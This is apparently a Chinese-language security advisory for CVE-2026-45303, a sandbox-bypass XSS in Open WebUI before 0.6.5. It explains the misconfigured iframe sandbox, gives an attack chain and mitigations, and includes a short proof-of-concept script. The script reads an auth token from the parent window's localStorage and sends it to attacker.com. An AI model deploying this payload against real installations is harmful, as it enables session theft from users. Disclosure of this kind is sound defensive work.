CVE-2026-45303 CVSS 7.7 高危

CVE-2026-45303 Open WebUI 沙箱绕过XSS漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45303

漏洞类型

跨站脚本攻击 (XSS) / 沙箱绕过

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.6.5版本之前，该平台存在一个严重的安全漏洞。攻击者可以通过HTML渲染视图注入并执行恶意脚本。虽然前端使用了iFrame沙箱机制，但由于配置了允许脚本执行和同源访问权限，导致沙箱隔离实际失效，攻击者可借此窃取本地存储等敏感数据。

技术细节

该漏洞源于前端HTML渲染功能的沙箱配置不当。当用户查看包含HTML内容的聊天记录时，系统将其嵌入到一个iFrame中。该iFrame的sandbox属性错误地包含了`allow-scripts`、`allow-forms`和`allow-same-origin`。根据安全策略，同时开启`allow-scripts`和`allow-same-origin`会导致沙箱保护形同虚设，因为脚本可以绕过沙箱限制直接访问父窗口的DOM和LocalStorage。尽管简单的alert弹窗可能受限，但攻击者仍可通过构造特定Payload绕过限制，执行任意恶意代码。

攻击链分析

STEP 1

1. 漏洞利用准备

攻击者构造包含恶意HTML/JavaScript代码的Payload，该代码旨在访问父窗口对象并窃取数据。

STEP 2

2. 投递Payload

攻击者通过Open WebUI的聊天界面发送包含恶意代码的消息。

STEP 3

3. 触发渲染

受害用户查看该聊天记录，前端将HTML内容渲染至配置不当的iFrame中。

STEP 4

4. 绕过沙箱

由于iFrame允许脚本和同源访问，恶意脚本在沙箱内执行并成功访问父窗口上下文（parent window）。

STEP 5

5. 数据窃取

攻击者的脚本从LocalStorage中读取敏感信息（如Session Token），并将其发送到外部服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept: Exploiting Sandbox Escape -->
<script>
  // Access parent window's localStorage due to allow-same-origin
  const sensitiveData = parent.localStorage.getItem('auth_token');
  
  // Exfiltrate data to an attacker controlled server
  if (sensitiveData) {
    fetch('https://attacker.com/exfil', {
      method: 'POST',
      body: JSON.stringify({ token: sensitiveData })
    });
  }
</script>

影响范围

Open WebUI < 0.6.5

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用HTML渲染功能，或者实施严格的Content Security Policy (CSP)以限制脚本的执行和数据的外发。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表